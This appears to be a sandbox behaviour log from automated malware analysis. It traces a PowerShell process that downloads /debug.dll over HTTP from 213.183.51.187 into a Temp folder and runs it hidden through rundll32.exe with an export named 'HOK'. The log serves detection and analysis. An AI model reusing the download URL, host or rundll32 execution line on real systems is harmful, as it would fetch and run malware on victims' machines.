Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine, value_name = ApplicationBase, data = C:\Windows\System32\WindowsPowerShell\v1.0, type = REG_SZ	1	Fn
Environment	Get Environment String	name = MshEnableTrace	7	Fn
File	Open	filename = STD_INPUT_HANDLE	1	Fn
Environment	Get Environment String	name = MshEnableTrace	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PowerShell\1\ShellIds	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PowerShell\1\ShellIds, value_name = PipelineMaxStackSizeMB, type = REG_NONE	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PowerShell\1\ShellIds	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PowerShell\1\ShellIds, value_name = PipelineMaxStackSizeMB, type = REG_NONE	1	Fn
File	Create	filename = CONOUT$, desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE	1	Fn
File	Write	filename = CONOUT$, size = 37	1	Fn Data
File	Create	filename = CONOUT$, desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE	1	Fn
File	Create	filename = CONOUT$, desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE	1	Fn
File	Create	filename = CONOUT$, desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE	1	Fn
File	Create	filename = CONIN$, desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_READ	1	Fn
File	Read	filename = CONIN$, size = 8192	1	Fn

Thread 0xaa8

(Host: 178, Network: 75)

Category	Operation	Information	Count	Logfile
Environment	Get Environment String	name = MshEnableTrace	22	Fn
Module	Get Filename	process_name = c:\windows\system32\windowspowershell\v1.0\powershell.exe, file_name_orig = C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, size = 260	1	Fn
File	Get Info	filename = C:\Windows\Microsoft.NET\Framework\v2.0.50727\Config\machine.config, type = file_attributes	2	Fn
File	Create	filename = C:\Windows\Microsoft.NET\Framework\v2.0.50727\Config\machine.config, desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ	1	Fn
File	Get Info	filename = C:\Windows\Microsoft.NET\Framework\v2.0.50727\Config\machine.config, type = file_type	2	Fn
File	Get Info	filename = C:\Windows\Microsoft.NET\Framework\v2.0.50727\Config\machine.config, type = size, size_out = 0	1	Fn
File	Read	filename = C:\Windows\Microsoft.NET\Framework\v2.0.50727\Config\machine.config, size = 4096, size_out = 4096	6	Fn Data
File	Read	filename = C:\Windows\Microsoft.NET\Framework\v2.0.50727\Config\machine.config, size = 4096, size_out = 1459	1	Fn Data
File	Read	filename = C:\Windows\Microsoft.NET\Framework\v2.0.50727\Config\machine.config, size = 4096, size_out = 0	1	Fn
Module	Get Filename	process_name = c:\windows\system32\windowspowershell\v1.0\powershell.exe, file_name_orig = C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, size = 260	1	Fn
File	Get Info	filename = C:\Windows\System32\WindowsPowerShell\v1.0\powershell.config, type = file_attributes	2	Fn
File	Create	filename = C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Tempdebug.dll, desired_access = GENERIC_WRITE, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ	1	Fn
File	Get Info	filename = C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Tempdebug.dll, type = file_type	2	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion, value_name = InstallationType, data = 0, type = REG_SZ	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion, value_name = InstallationType, data = Client, type = REG_SZ	1	Fn
Socket	Create	protocol = IPPROTO_IP, address_family = AF_INET, type = SOCK_DGRAM	1	Fn
Socket	Close	type = SOCK_DGRAM	1	Fn
Socket	Create	protocol = IPPROTO_IP, address_family = AF_INET6, type = SOCK_DGRAM	1	Fn
Socket	Close	type = SOCK_DGRAM	1	Fn
System	Get Computer Name	result_out = F71GWAT	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\.NET CLR Networking\Performance	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\.NET CLR Networking\Performance, value_name = Library, data = 0, type = REG_SZ	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\.NET CLR Networking\Performance, value_name = Library, data = netfxperf.dll, type = REG_SZ	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\.NET CLR Networking\Performance, value_name = IsMultiInstance, type = REG_DWORD_LITTLE_ENDIAN	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\.NET CLR Networking\Performance, value_name = IsMultiInstance, data = 1, type = REG_DWORD_LITTLE_ENDIAN	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\.NET CLR Networking\Performance, value_name = First Counter, type = REG_DWORD_LITTLE_ENDIAN	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\.NET CLR Networking\Performance, value_name = First Counter, data = 4160, type = REG_DWORD_LITTLE_ENDIAN	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\.net clr networking\Performance	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\.net clr networking\Performance, value_name = CategoryOptions, type = REG_DWORD_LITTLE_ENDIAN	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\.net clr networking\Performance, value_name = CategoryOptions, data = 3, type = REG_DWORD_LITTLE_ENDIAN	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\.net clr networking\Performance, value_name = FileMappingSize, type = REG_DWORD_LITTLE_ENDIAN	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\.net clr networking\Performance, value_name = FileMappingSize, data = 131072, type = REG_DWORD_LITTLE_ENDIAN	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\.net clr networking\Performance, value_name = Counter Names, type = REG_BINARY	2	Fn Data
Module	Create Mapping	filename = System Paging File, protection = PAGE_READWRITE, maximum_size = 131072	1	Fn
Module	Map	process_name = c:\windows\system32\windowspowershell\v1.0\powershell.exe, desired_access = FILE_MAP_WRITE	1	Fn
System	Get Info	type = Operating System	2	Fn
Mutex	Create	mutex_name = Global\.net clr networking	1	Fn
Mutex	Create	mutex_name = Global\.net clr networking	1	Fn
Mutex	Open	mutex_name = Global\.net clr networking, desired_access = MUTEX_MODIFY_STATE, SYNCHRONIZE	1	Fn
Mutex	Release	mutex_name = Global\.net clr networking	1	Fn
Mutex	Release	mutex_name = Global\.net clr networking	1	Fn
Mutex	Create	mutex_name = Global\.net clr networking	1	Fn
Mutex	Release	mutex_name = Global\.net clr networking	1	Fn
Mutex	Create	mutex_name = Global\.net clr networking	1	Fn
Mutex	Release	mutex_name = Global\.net clr networking	1	Fn
Mutex	Create	mutex_name = Global\.net clr networking	1	Fn
Mutex	Release	mutex_name = Global\.net clr networking	1	Fn
Mutex	Create	mutex_name = Global\.net clr networking	1	Fn
Mutex	Release	mutex_name = Global\.net clr networking	1	Fn
Mutex	Create	mutex_name = Global\.net clr networking	1	Fn
Mutex	Release	mutex_name = Global\.net clr networking	1	Fn
Mutex	Create	mutex_name = Global\.net clr networking	1	Fn
Mutex	Release	mutex_name = Global\.net clr networking	1	Fn
Mutex	Create	mutex_name = Global\.net clr networking	1	Fn
Mutex	Release	mutex_name = Global\.net clr networking	1	Fn
Mutex	Create	mutex_name = Global\.net clr networking	1	Fn
Mutex	Release	mutex_name = Global\.net clr networking	1	Fn
Mutex	Create	mutex_name = Global\.net clr networking	1	Fn
Mutex	Release	mutex_name = Global\.net clr networking	1	Fn
Socket	Create	protocol = IPPROTO_IP, address_family = AF_INET, type = SOCK_DGRAM	1	Fn
Socket	Create	protocol = IPPROTO_IP, address_family = AF_INET6, type = SOCK_DGRAM	1	Fn
Registry	Open Key	reg_name = HKEY_CURRENT_USER	1	Fn
Registry	Open Key	reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\CurrentVersion\Internet Settings	1	Fn
Socket	Create	protocol = IPPROTO_IP, address_family = AF_INET, type = SOCK_DGRAM	1	Fn
Socket	Create	protocol = IPPROTO_IP, address_family = AF_INET6, type = SOCK_DGRAM	1	Fn
Socket	Create	protocol = IPPROTO_TCP, address_family = AF_INET, type = SOCK_STREAM	1	Fn
Socket	Create	protocol = IPPROTO_TCP, address_family = AF_INET6, type = SOCK_STREAM	1	Fn
Socket	Connect	remote_address = 213.183.51.187, remote_port = 80	1	Fn
Socket	Close	type = SOCK_STREAM	1	Fn
Socket	Send	flags = NO_FLAG_SET, size = 73, size_out = 73	1	Fn Data
Inet	Open Session	access_type = WINHTTP_ACCESS_TYPE_NO_PROXY, proxy_name = WINHTTP_NO_PROXY_NAME, proxy_bypass = WINHTTP_NO_PROXY_BYPASS	1	Fn
Inet	Open Connection	protocol = http, server_name = 213.183.51.187, server_port = 80	1	Fn
Inet	Open HTTP Request	http_verb = GET, http_version = HTTP/1.1, target_resource = /debug.dll	1	Fn
Inet	Send HTTP Request	headers = host: 213.183.51.187, connection: Keep-Alive, url = 213.183.51.187/debug.dll	1	Fn Data
Socket	Receive	flags = NO_FLAG_SET, size = 4096, size_out = 4096	1	Fn Data
Inet	Read Response	size = 4096, size_out = 4096	1	Fn Data
Socket	Receive	flags = NO_FLAG_SET, size = 65536, size_out = 1712	1	Fn Data
Inet	Read Response	size = 65536, size_out = 1712	1	Fn Data
File	Write	filename = C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Tempdebug.dll, size = 4096	1	Fn Data
Socket	Receive	flags = NO_FLAG_SET, size = 65536, size_out = 65536	1	Fn Data
Inet	Read Response	size = 65536, size_out = 65536	1	Fn Data
File	Write	filename = C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Tempdebug.dll, size = 4096	1	Fn Data
File	Write	filename = C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Tempdebug.dll, size = 62910	1	Fn Data
Socket	Receive	flags = NO_FLAG_SET, size = 65536, size_out = 8516	1	Fn Data
Inet	Read Response	size = 65536, size_out = 8516	1	Fn Data
File	Write	filename = C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Tempdebug.dll, size = 8516	1	Fn Data
Socket	Receive	flags = NO_FLAG_SET, size = 65536, size_out = 7260	1	Fn Data
Inet	Read Response	size = 65536, size_out = 7260	1	Fn Data
File	Write	filename = C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Tempdebug.dll, size = 7260	1	Fn Data
Socket	Receive	flags = NO_FLAG_SET, size = 65536, size_out = 49368	1	Fn Data
Inet	Read Response	size = 65536, size_out = 49368	1	Fn Data
File	Write	filename = C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Tempdebug.dll, size = 49368	1	Fn Data
Socket	Receive	flags = NO_FLAG_SET, size = 65536, size_out = 8712	1	Fn Data
Inet	Read Response	size = 65536, size_out = 8712	1	Fn Data
File	Write	filename = C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Tempdebug.dll, size = 8712	1	Fn Data
Socket	Receive	flags = NO_FLAG_SET, size = 65536, size_out = 3752	1	Fn Data
Inet	Read Response	size = 65536, size_out = 3752	1	Fn Data
Socket	Receive	flags = NO_FLAG_SET, size = 65536, size_out = 6412	1	Fn Data
Inet	Read Response	size = 65536, size_out = 6412	1	Fn Data
File	Write	filename = C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Tempdebug.dll, size = 4096	1	Fn Data
File	Write	filename = C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Tempdebug.dll, size = 6068	1	Fn Data
Socket	Receive	flags = NO_FLAG_SET, size = 65536, size_out = 2904	1	Fn Data
Inet	Read Response	size = 65536, size_out = 2904	1	Fn Data
Socket	Receive	flags = NO_FLAG_SET, size = 65536, size_out = 65536	1	Fn Data
Inet	Read Response	size = 65536, size_out = 65536	1	Fn Data
File	Write	filename = C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Tempdebug.dll, size = 4096	1	Fn Data
File	Write	filename = C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Tempdebug.dll, size = 64344	1	Fn Data
Socket	Receive	flags = NO_FLAG_SET, size = 65536, size_out = 7064	1	Fn Data
Inet	Read Response	size = 65536, size_out = 7064	1	Fn Data
File	Write	filename = C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Tempdebug.dll, size = 7064	1	Fn Data
Socket	Receive	flags = NO_FLAG_SET, size = 65536, size_out = 2904	1	Fn Data
Inet	Read Response	size = 65536, size_out = 2904	1	Fn Data
Socket	Receive	flags = NO_FLAG_SET, size = 65536, size_out = 1452	1	Fn Data
Inet	Read Response	size = 65536, size_out = 1452	1	Fn Data
File	Write	filename = C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Tempdebug.dll, size = 4096	1	Fn Data
Socket	Receive	flags = NO_FLAG_SET, size = 65536, size_out = 5808	1	Fn Data
Inet	Read Response	size = 65536, size_out = 5808	1	Fn Data
File	Write	filename = C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Tempdebug.dll, size = 4096	1	Fn Data
Socket	Receive	flags = NO_FLAG_SET, size = 65536, size_out = 21780	1	Fn Data
Inet	Read Response	size = 65536, size_out = 21780	1	Fn Data
File	Write	filename = C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Tempdebug.dll, size = 4096	1	Fn Data
File	Write	filename = C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Tempdebug.dll, size = 19656	1	Fn Data
Socket	Receive	flags = NO_FLAG_SET, size = 65536, size_out = 5808	1	Fn Data
Inet	Read Response	size = 65536, size_out = 5808	1	Fn Data
File	Write	filename = C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Tempdebug.dll, size = 5808	1	Fn Data
Socket	Receive	flags = NO_FLAG_SET, size = 65536, size_out = 65536	1	Fn Data
Inet	Read Response	size = 65536, size_out = 65536	1	Fn Data
File	Write	filename = C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Tempdebug.dll, size = 65536	1	Fn Data
Socket	Receive	flags = NO_FLAG_SET, size = 65536, size_out = 12872	1	Fn Data
Inet	Read Response	size = 65536, size_out = 12872	1	Fn Data
File	Write	filename = C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Tempdebug.dll, size = 12872	1	Fn Data
Socket	Receive	flags = NO_FLAG_SET, size = 65536, size_out = 46188	1	Fn Data
Inet	Read Response	size = 65536, size_out = 46188	1	Fn Data
File	Write	filename = C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Tempdebug.dll, size = 46188	1	Fn Data
Socket	Receive	flags = NO_FLAG_SET, size = 65536, size_out = 13068	1	Fn Data
Inet	Read Response	size = 65536, size_out = 13068	1	Fn Data
File	Write	filename = C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Tempdebug.dll, size = 13068	1	Fn Data
Socket	Receive	flags = NO_FLAG_SET, size = 65536, size_out = 2904	1	Fn Data
Inet	Read Response	size = 65536, size_out = 2904	1	Fn Data
Socket	Receive	flags = NO_FLAG_SET, size = 65536, size_out = 1452	1	Fn Data
Inet	Read Response	size = 65536, size_out = 1452	1	Fn Data
File	Write	filename = C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Tempdebug.dll, size = 4096	1	Fn Data
Socket	Receive	flags = NO_FLAG_SET, size = 65536, size_out = 2904	1	Fn Data
Inet	Read Response	size = 65536, size_out = 2904	1	Fn Data
Socket	Receive	flags = NO_FLAG_SET, size = 65536, size_out = 65536	1	Fn Data
Inet	Read Response	size = 65536, size_out = 65536	1	Fn Data
File	Write	filename = C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Tempdebug.dll, size = 4096	1	Fn Data
File	Write	filename = C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Tempdebug.dll, size = 64604	1	Fn Data
Socket	Receive	flags = NO_FLAG_SET, size = 52618, size_out = 17228	1	Fn Data
Inet	Read Response	size = 52618, size_out = 17228	1	Fn Data
File	Write	filename = C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Tempdebug.dll, size = 17228	1	Fn Data
Socket	Receive	flags = NO_FLAG_SET, size = 35390, size_out = 5808	1	Fn Data
Inet	Read Response	size = 35390, size_out = 5808	1	Fn Data
File	Write	filename = C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Tempdebug.dll, size = 5808	1	Fn Data
Socket	Receive	flags = NO_FLAG_SET, size = 29582, size_out = 4356	1	Fn Data
Inet	Read Response	size = 29582, size_out = 4356	1	Fn Data
File	Write	filename = C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Tempdebug.dll, size = 4356	1	Fn Data
Socket	Receive	flags = NO_FLAG_SET, size = 25226, size_out = 25226	1	Fn Data
Inet	Read Response	size = 25226, size_out = 25226	1	Fn Data
File	Write	filename = C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Tempdebug.dll, size = 25226	1	Fn Data
Environment	Get Environment String	name = MshEnableTrace	7	Fn
File	Create	filename = CONOUT$, desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE	1	Fn
Environment	Get Environment String	name = MshEnableTrace	2	Fn
File	Create	filename = CONOUT$, desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE	1	Fn
File	Create	filename = CONOUT$, desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE	1	Fn
File	Open	filename = STD_ERROR_HANDLE	1	Fn
File	Create	filename = CONOUT$, desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE	1	Fn
File	Create	filename = CONOUT$, desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE	1	Fn
File	Create	filename = CONOUT$, desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE	2	Fn
File	Open	filename = STD_OUTPUT_HANDLE	1	Fn
File	Create	filename = CONOUT$, desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE	1	Fn
File	Write	filename = CONOUT$, size = 79	1	Fn Data
File	Create	filename = CONOUT$, desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE	3	Fn
File	Write	filename = CONOUT$, size = 1	1	Fn Data
File	Create	filename = CONOUT$, desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE	1	Fn
File	Create	filename = CONOUT$, desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE	1	Fn
File	Create	filename = CONOUT$, desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE	1	Fn
File	Create	filename = CONOUT$, desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE	3	Fn
File	Write	filename = CONOUT$, size = 4	1	Fn Data
File	Create	filename = CONOUT$, desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE	3	Fn
File	Write	filename = CONOUT$, size = 1	1	Fn Data
File	Create	filename = CONOUT$, desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE	1	Fn
File	Create	filename = CONOUT$, desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE	1	Fn
File	Create	filename = CONOUT$, desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE	1	Fn
File	Create	filename = CONOUT$, desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE	3	Fn
File	Write	filename = CONOUT$, size = 16	1	Fn Data
File	Create	filename = CONOUT$, desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE	3	Fn
File	Write	filename = CONOUT$, size = 1	1	Fn Data
File	Create	filename = CONOUT$, desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE	1	Fn
File	Create	filename = CONOUT$, desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE	1	Fn
File	Create	filename = CONOUT$, desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE	1	Fn
File	Create	filename = CONOUT$, desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE	3	Fn
File	Write	filename = CONOUT$, size = 79	1	Fn Data
File	Create	filename = CONOUT$, desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE	3	Fn
File	Write	filename = CONOUT$, size = 1	1	Fn Data
File	Create	filename = CONOUT$, desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE	1	Fn
File	Create	filename = CONOUT$, desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE	1	Fn
File	Create	filename = CONOUT$, desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE	1	Fn
File	Create	filename = CONOUT$, desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE	3	Fn
File	Write	filename = CONOUT$, size = 79	1	Fn Data
File	Create	filename = CONOUT$, desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE	3	Fn
File	Write	filename = CONOUT$, size = 1	1	Fn Data
File	Create	filename = CONOUT$, desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE	1	Fn
File	Create	filename = CONOUT$, desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE	1	Fn
File	Create	filename = CONOUT$, desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE	1	Fn
File	Create	filename = CONOUT$, desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE	3	Fn
File	Write	filename = CONOUT$, size = 48	1	Fn Data
File	Create	filename = CONOUT$, desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE	3	Fn
File	Write	filename = CONOUT$, size = 1	1	Fn Data
File	Create	filename = CONOUT$, desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE	1	Fn
File	Create	filename = CONOUT$, desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE	1	Fn
File	Create	filename = CONOUT$, desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE	1	Fn
File	Create	filename = CONOUT$, desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE	3	Fn
File	Write	filename = CONOUT$, size = 79	1	Fn Data
File	Create	filename = CONOUT$, desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE	3	Fn
File	Write	filename = CONOUT$, size = 1	1	Fn Data
File	Create	filename = CONOUT$, desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE	1	Fn
File	Create	filename = CONOUT$, desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE	1	Fn
File	Create	filename = CONOUT$, desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE	1	Fn
File	Create	filename = CONOUT$, desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE	3	Fn
File	Write	filename = CONOUT$, size = 28	1	Fn Data
File	Create	filename = CONOUT$, desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE	3	Fn
File	Write	filename = CONOUT$, size = 1	1	Fn Data
File	Create	filename = CONOUT$, desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE	1	Fn
File	Create	filename = CONOUT$, desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE	1	Fn
File	Create	filename = CONOUT$, desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE	1	Fn
File	Create	filename = CONOUT$, desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE	3	Fn
File	Write	filename = CONOUT$, size = 79	1	Fn Data
File	Create	filename = CONOUT$, desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE	3	Fn
File	Write	filename = CONOUT$, size = 1	1	Fn Data
File	Create	filename = CONOUT$, desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE	1	Fn
File	Create	filename = CONOUT$, desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE	1	Fn
File	Create	filename = CONOUT$, desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE	1	Fn
File	Create	filename = CONOUT$, desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE	3	Fn
File	Write	filename = CONOUT$, size = 55	1	Fn Data
File	Create	filename = CONOUT$, desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE	3	Fn
File	Write	filename = CONOUT$, size = 1	1	Fn Data
File	Create	filename = CONOUT$, desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE	1	Fn
File	Create	filename = CONOUT$, desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE	1	Fn
File	Create	filename = CONOUT$, desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE	1	Fn
File	Create	filename = CONOUT$, desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE	3	Fn
File	Write	filename = CONOUT$, size = 1	1	Fn Data
File	Create	filename = CONOUT$, desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE	3	Fn
File	Write	filename = CONOUT$, size = 1	1	Fn Data
Environment	Get Environment String	name = PATHEXT, result_out = .COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC	1	Fn
Environment	Get Environment String	name = PATH, result_out = C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\	1	Fn
File	Get Info	filename = C:\Windows\system32\rundll32.exe, type = file_attributes	1	Fn
Environment	Get Environment String	name = MshEnableTrace	4	Fn
Environment	Get Environment String	name = PATHEXT, result_out = .COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC	2	Fn
Process	Create	process_name = "C:\Windows\system32\rundll32.exe" C:\Users\BGC6U8~1\AppData\Local\Tempdebug.dll HOK, os_pid = 0xae4, show_window = SW_HIDE	1	Fn

Thread 0xaec

(Host: 1, Network: 0)

Category	Operation	Information	Success	Count	Logfile
Environment	Get Environment String	name = MshEnableTrace		5	Fn

Process #4: rundll32.exe

(Host: 102, Network: 0)

Information	Value
ID	#4
File Name	c:\windows\system32\rundll32.exe
Command Line	"C:\Windows\system32\rundll32.exe" C:\Users\BGC6U8~1\AppData\Local\Tempdebug.dll HOK
Initial Working Directory	C:\Users\BGC6u8Oy yXGxkR\Desktop\
Monitor	Start Time: 00:00:44, Reason: Child Process
Unmonitor	End Time: 00:02:15, Reason: Terminated by Timeout
Monitor Duration	00:01:31

OS Process Information

Information	Value
PID	0xae4
Parent PID	0xa50 (c:\windows\system32\windowspowershell\v1.0\powershell.exe)
Is Created or Modified Executable
Integrity Level	Medium
Username	F71GWAT\BGC6u8Oy yXGxkR
Groups	F71GWAT\Domain Users (MANDATORY, ENABLED_BY_DEFAULT, ENABLED) Everyone (MANDATORY, ENABLED_BY_DEFAULT, ENABLED) BUILTIN\Administrators (USE_FOR_DENY_ONLY) BUILTIN\Users (MANDATORY, ENABLED_BY_DEFAULT, ENABLED) NT AUTHORITY\INTERACTIVE (MANDATORY, ENABLED_BY_DEFAULT, ENABLED) CONSOLE LOGON (MANDATORY, ENABLED_BY_DEFAULT, ENABLED) NT AUTHORITY\Authenticated Users (MANDATORY, ENABLED_BY_DEFAULT, ENABLED) NT AUTHORITY\This Organization (MANDATORY, ENABLED_BY_DEFAULT, ENABLED) NT AUTHORITY\Logon Session 00000000:0000fcb0 (MANDATORY, ENABLED_BY_DEFAULT, ENABLED, LOGON_ID) LOCAL (MANDATORY, ENABLED_BY_DEFAULT, ENABLED) NT AUTHORITY\NTLM Authentication (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
Enabled Privileges	SeChangeNotifyPrivilege
